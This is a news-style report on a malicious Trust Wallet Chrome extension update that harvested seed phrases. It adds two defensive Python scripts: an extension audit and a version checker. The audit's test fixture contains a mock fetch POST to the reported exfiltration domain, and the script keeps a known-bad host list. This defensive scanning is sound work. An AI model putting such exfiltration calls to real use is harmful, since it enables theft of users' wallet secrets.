A severe security breach struck users of the Trust Wallet Chrome browser extension, resulting in the theft of millions of dollars worth of cryptocurrency after a malicious version of the extension was published to the Chrome Web Store. Threat actors hijacked the wallet’s release process to push a compromised update (version 2.68) between December 24–26, secretly harvesting users’ sensitive wallet data and draining assets without user consent. This incident has sent shockwaves through the cryptocurrency community and highlights ongoing risks with browser-based wallets and software supply chain attacks.

In response, Trust Wallet has released a patched version (2.69), paused risky API keys, and launched a reimbursement/verification process to help victims recover their lost funds. At the same time, analysts are cautioning users about browser extension threats and urging stronger security practices for managing crypto assets.

What Happened With Trust Wallet Extension

The incident centered on the Trust Wallet Chrome browser extension, a popular tool used by many cryptocurrency holders to manage digital assets directly in the web browser. On December 24, 2025, users began receiving an update to version 2.68 that appeared legitimate but contained malicious code.

Instead of performing standard wallet functions, the compromised code was designed to capture wallet mnemonic phrases and private key material when users unlocked their wallets or entered seed phrases. This data was then transmitted to a malicious backend server controlled by the attacker at a domain such as metrics-trustwallet[.]com, allowing them to recreate and control victims’ wallets.

The breach primarily affected users who logged into the extension or unlocked their wallets using version 2.68 before Trust Wallet identified and patched the issue. Mobile app users and other versions of the wallet were reportedly unaffected.

How Much Was Stolen — Impact on Users

Initial estimates from blockchain forensic analysts suggested that around $7 million in cryptocurrency was stolen in the attack.

However, updated figures indicate that as many as 2,520 wallet addresses — tied to roughly $8.5 million in crypto assets — were impacted by the breach. These assets spanned major blockchains, including Bitcoin (BTC), Ethereum (ETH), Solana (SOL), and others.

Fund movements on-chain showed the stolen crypto being rapidly transferred to addresses under the hacker’s control and, in some cases, routed through centralized exchanges and cross-chain bridges — a common tactic to obfuscate the trail.

Overall, hundreds to thousands of users reported unauthorized withdrawals from wallets managed by the compromised extension, often with no additional user interaction required.

How the Attack Worked: Supply Chain Compromise

The root cause of the breach was not a simple vulnerability in the extension code but a supply chain compromise that allowed attackers to publish a malicious build to the official Chrome Web Store:

Leaked Developer Secrets

Investigators have tied the attack to a broader software supply chain outbreak known as Shai-Hulud (or Sha1-Hulud) — a malicious worm-like campaign that has been targeting open-source tooling and developer environments throughout late 2025.

According to Trust Wallet’s post-mortem, developer GitHub secrets were exposed in this ecosystem compromise, giving the attacker access to internal source code and — critically — the Chrome Web Store (CWS) API key. This key enabled them to publish builds outside Trust Wallet’s normal internal release process, bypassing manual review and security checks.

Malicious Update Deployment

With CWS API access and the wallet’s source code, the attacker prepared a modified version of the extension that included the backdoor for harvesting seed phrases. Because it was signed and published via the legitimate Chrome Web Store channel, it passed superficial validation and was automatically delivered to users who had auto-updates enabled.

Data Harvesting Mechanism

Once installed, the backdoor acted stealthily:

  • The malicious code triggered whenever users unlocked their wallet or entered seed phrases — not just when importing a wallet.
  • It collected mnemonic phrases for all wallets configured in the extension, even dormant ones.
  • Collected data was sent to a remote server, after which attackers used it to restore wallets and sign unauthorized transactions.

Because Chrome extensions operate with broad privileges, this backdoor had direct access to sensitive wallet data without requiring users to accept suspicious permissions.
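As an added example (not code from the original article, and not Trust Wallet's own tooling), the following Python script shows the kind of defensive check a reviewer can run against an unpacked extension before trusting an update: it collects every host referenced by URL literals in the extension's JavaScript and by the manifest's connect-src directive, then flags any host that is not on an allowlist for the wallet or that matches the exfiltration domain the article names (metrics-trustwallet[.]com). The sample extension files, the allowlist hosts and the function names are constructed for this demonstration.

```python
import json
import os
import re
import tempfile
from urllib.parse import urlparse

# Exfiltration domain reported in the article (printed defanged there as
# metrics-trustwallet[.]com).
KNOWN_BAD_HOSTS = {"metrics-trustwallet.com"}

# Hosts the genuine wallet is expected to contact. Constructed placeholder
# allowlist for this demo; a real audit uses the hosts documented for the extension.
ALLOWED_HOSTS = {"api.example-wallet.invalid", "rpc.example-wallet.invalid"}

URL_RE = re.compile(r"""(?:https?|wss?)://[^\s"'`<>)]+""")


def hosts_in_text(text):
    """Host names of every http(s)/ws(s) URL literal found in a blob of source text."""
    hosts = set()
    for match in URL_RE.finditer(text):
        host = urlparse(match.group(0)).hostname
        if host:
            hosts.add(host)
    return hosts


def hosts_in_manifest(manifest):
    """Hosts permitted by the manifest's connect-src CSP directive (MV2 string or MV3 dict)."""
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):
        csp = " ".join(v for v in csp.values() if isinstance(v, str))
    hosts = set()
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0] == "connect-src":
            for src in parts[1:]:
                if "://" in src:
                    hosts |= hosts_in_text(src)
    return hosts


def audit_extension(root):
    """Walk an unpacked extension; return sorted (file, host, reason) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name == "manifest.json":
                with open(path, encoding="utf-8") as fh:
                    hosts = hosts_in_manifest(json.load(fh))
            elif name.endswith(".js"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hosts = hosts_in_text(fh.read())
            else:
                continue
            for host in sorted(hosts):
                if host in KNOWN_BAD_HOSTS:
                    findings.append((rel, host, "known exfiltration domain"))
                elif host not in ALLOWED_HOSTS:
                    findings.append((rel, host, "host not on allowlist"))
    return sorted(findings)


def build_sample(root):
    """Constructed sample extension: benign RPC code plus two suspicious destinations."""
    os.makedirs(os.path.join(root, "src"))
    manifest = {
        "manifest_version": 3,
        "name": "Sample Wallet",
        "version": "2.68.0",
        "content_security_policy": {
            "extension_pages": "script-src 'self'; connect-src "
                               "https://api.example-wallet.invalid https://metrics-trustwallet.com"
        },
    }
    with open(os.path.join(root, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    with open(os.path.join(root, "src", "rpc.js"), "w", encoding="utf-8") as fh:
        fh.write('fetch("https://rpc.example-wallet.invalid/v1/balance");\n'
                 'fetch("https://cdn.example-analytics.invalid/t.js");\n')
    with open(os.path.join(root, "src", "unlock.js"), "w", encoding="utf-8") as fh:
        # Fixture only: mimics the destination of the reported backdoor, nothing else.
        fh.write('fetch("https://metrics-trustwallet.com/collect", {method: "POST", body: ""});\n')


def demo():
    """Audit the constructed sample in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return audit_extension(tmp)


if __name__ == "__main__":
    for rel, host, reason in demo():
        print(f"{rel}: {host} ({reason})")
```

Run as-is, the script audits the constructed sample in a temporary directory; point audit_extension() at an unpacked extension folder to audit a real one. A string-literal scan is only a first pass: obfuscated or concatenated URLs will not match, which is why the manifest's connect-src list is worth checking alongside the code, since the browser enforces it regardless of how the script builds the URL.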

Response From Trust Wallet and Binance

Trust Wallet quickly responded to the incident:

Patch and Update

  • On December 25, 2025, the company released a fixed version (2.69) of the extension to remove the malicious code and close the breach window.
  • Users were strongly urged to disable version 2.68 immediately and update only through the official Chrome Web Store to prevent further exploitation.

Reimbursement and Verification

Trust Wallet launched an official reimbursement process where victims can submit claims through a support portal. Because of an influx of nearly 5,000 claims — including potential duplicates or exaggerated submissions — the company implemented a wallet verification phase to ensure payouts go to legitimate victims.

So far, Trust Wallet has identified 2,596 compromised wallet addresses but continues to vet claims carefully to reduce fraud and ensure accuracy before issuing reimbursements.

Public Assurance From Binance Leadership

Changpeng Zhao (CZ), co-founder of Binance — the company historically associated with Trust Wallet — publicly confirmed that affected users will be reimbursed and assured the community that “user funds are SAFU (Secure Asset Fund for Users)” during a related incident update.

The security team also emphasised that only the Chrome extension was impacted — mobile and other desktop versions were unaffected.

Scope and Affected Crypto

The stolen assets included:

  • Bitcoin (BTC)
  • Ethereum (ETH)
  • Solana (SOL)
  • BNB Chain assets
  • Other major tokens stored in the compromised wallets

While the initial round of reporting pointed to ~$7M losses, recent forensics suggest the actual total may approach ~$8.5M — especially once connected addresses and laundering routes are fully mapped.

Broader Security Implications

This incident is a stark reminder of the risks inherent to browser-based wallet extensions, particularly when tied to large amounts of digital assets and highly automated publishing pipelines:

Supply Chain Risks

Software supply chain attacks — where attackers infiltrate development tools, repositories, or CI/CD pipelines to introduce malicious code — remain among the most dangerous threats because the malicious code appears legitimate and inherits trust from the original software.

Need for Strong Secret Management

The exploitation of exposed GitHub secrets underlines the importance of secure credential storage, secret rotation, and robust access control for development processes, especially in teams managing critical financial tooling.

Elevated Privilege of Browser Extensions

Chrome extensions can access browser APIs that are powerful by design — which makes them useful but also risky if compromised. As this breach shows, even users who do not actively authorize suspicious apps can be harmed if malicious code is distributed through a trusted update channel.

What Users Should Do Now

If you use the Trust Wallet Chrome extension or similar browser wallets:

Disable the Affected Extension Immediately

Check your installed version and uninstall or disable version 2.68. This stops the malicious code from executing further.
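To make the version check concrete, here is an added Python example (not from the article and not from Trust Wallet) that inventories the extensions installed in Chrome's Default profile by reading each version directory's manifest.json, resolves localized __MSG_ names from _locales, and flags a Trust Wallet entry whose version is 2.68.x. The profile paths are the standard Chrome locations for Windows, macOS and Linux; the extension IDs and manifests in the sample are constructed placeholders, not real Chrome Web Store IDs.

```python
import json
import os
import platform
import tempfile

AFFECTED_NAME = "trust wallet"      # matched case-insensitively against the manifest name
AFFECTED_VERSIONS = {("2", "68")}   # 2.68.x per the article; 2.69 is the patched release


def default_extension_dirs():
    """Chrome's Extensions folder for the Default profile on the current OS."""
    home = os.path.expanduser("~")
    system = platform.system()
    if system == "Windows":
        base = os.path.join(os.environ.get("LOCALAPPDATA", home),
                            "Google", "Chrome", "User Data")
    elif system == "Darwin":
        base = os.path.join(home, "Library", "Application Support", "Google", "Chrome")
    else:
        base = os.path.join(home, ".config", "google-chrome")
    return [os.path.join(base, "Default", "Extensions")]


def resolve_name(ext_dir, manifest):
    """Manifest names are often __MSG_key__ placeholders resolved from _locales."""
    name = manifest.get("name", "")
    if name.startswith("__MSG_") and name.endswith("__"):
        key = name[len("__MSG_"):-2]
        locale = manifest.get("default_locale", "en")
        msg_path = os.path.join(ext_dir, "_locales", locale, "messages.json")
        try:
            with open(msg_path, encoding="utf-8") as fh:
                name = json.load(fh).get(key, {}).get("message", name)
        except (OSError, ValueError):
            pass
    return name


def version_key(version):
    """Split '2.68.0' into ('2', '68', '0') so the major.minor prefix can be compared."""
    return tuple(version.split("."))


def scan_extensions(extensions_root):
    """Return [(extension_id, name, version, affected)] for every installed version dir.

    Chrome lays extensions out as <Extensions>/<id>/<version>_<n>/manifest.json.
    """
    results = []
    if not os.path.isdir(extensions_root):
        return results
    for ext_id in sorted(os.listdir(extensions_root)):
        id_dir = os.path.join(extensions_root, ext_id)
        if not os.path.isdir(id_dir):
            continue
        for ver_dir in sorted(os.listdir(id_dir)):
            ext_dir = os.path.join(id_dir, ver_dir)
            manifest_path = os.path.join(ext_dir, "manifest.json")
            if not os.path.isfile(manifest_path):
                continue
            with open(manifest_path, encoding="utf-8") as fh:
                manifest = json.load(fh)
            name = resolve_name(ext_dir, manifest)
            version = manifest.get("version", "")
            affected = (AFFECTED_NAME in name.lower()
                        and version_key(version)[:2] in AFFECTED_VERSIONS)
            results.append((ext_id, name, version, affected))
    return results


def _write_json(path, obj):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(obj, fh)


def build_sample(root):
    """Constructed sample profile: placeholder IDs, not real Chrome Web Store IDs."""
    wallet_id, other_id = "a" * 32, "b" * 32
    for ver in ("2.68.0", "2.69.0"):
        ext_dir = os.path.join(root, wallet_id, ver + "_0")
        _write_json(os.path.join(ext_dir, "manifest.json"),
                    {"name": "__MSG_appName__", "default_locale": "en", "version": ver})
        _write_json(os.path.join(ext_dir, "_locales", "en", "messages.json"),
                    {"appName": {"message": "Trust Wallet"}})
    _write_json(os.path.join(root, other_id, "1.0.0_0", "manifest.json"),
                {"name": "Other Extension", "version": "1.0.0"})


def demo():
    """Scan the constructed sample; returns the same structure scan_extensions() gives."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return scan_extensions(tmp)


if __name__ == "__main__":
    # Real scan first, then the constructed sample so the output is never empty.
    for ext_root in default_extension_dirs():
        for ext_id, name, version, affected in scan_extensions(ext_root):
            flag = "AFFECTED - disable now" if affected else "ok"
            print(f"{ext_id} {name} {version}: {flag}")
    print("sample:", demo())
```

The script only reads the Default profile; additional Chrome profiles live in sibling "Profile N" directories under the same User Data folder and would need to be added to default_extension_dirs(). A flagged entry means the affected build is still on disk, so the steps that follow (disable, reinstall 2.69 from the Chrome Web Store, move funds to a fresh wallet) still apply even if Chrome has since auto-updated.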

Update Only from Official Sources

After disabling, install the patched version (2.69) only through the Chrome Web Store to ensure integrity.

Move Assets to New Secure Wallets

For any wallet accessed during the breach window, transfer funds to a new wallet with a fresh seed phrase you have never entered into an extension.

Be Skeptical of Links and External Messages

Watch for phishing and fake support threads that could try to exploit victims again — especially after major breaches.

Lessons for the Crypto Ecosystem

The Trust Wallet Chrome extension hack is a critical case study in the evolving threat landscape for decentralized finance and crypto utilities:

  • Supply chain defenses must evolve to protect against sophisticated build/publishing compromises.
  • Secret management and access controls are vital to prevent unauthorized code releases.
  • Browser extensions with sensitive privileges require higher security standards than general-purpose apps.

For users and developers alike, this incident underscores that even reputed tools can be attacked — and that vigilance, layered security, and rapid response capabilities are essential in the era of blockchain and Web3 technology.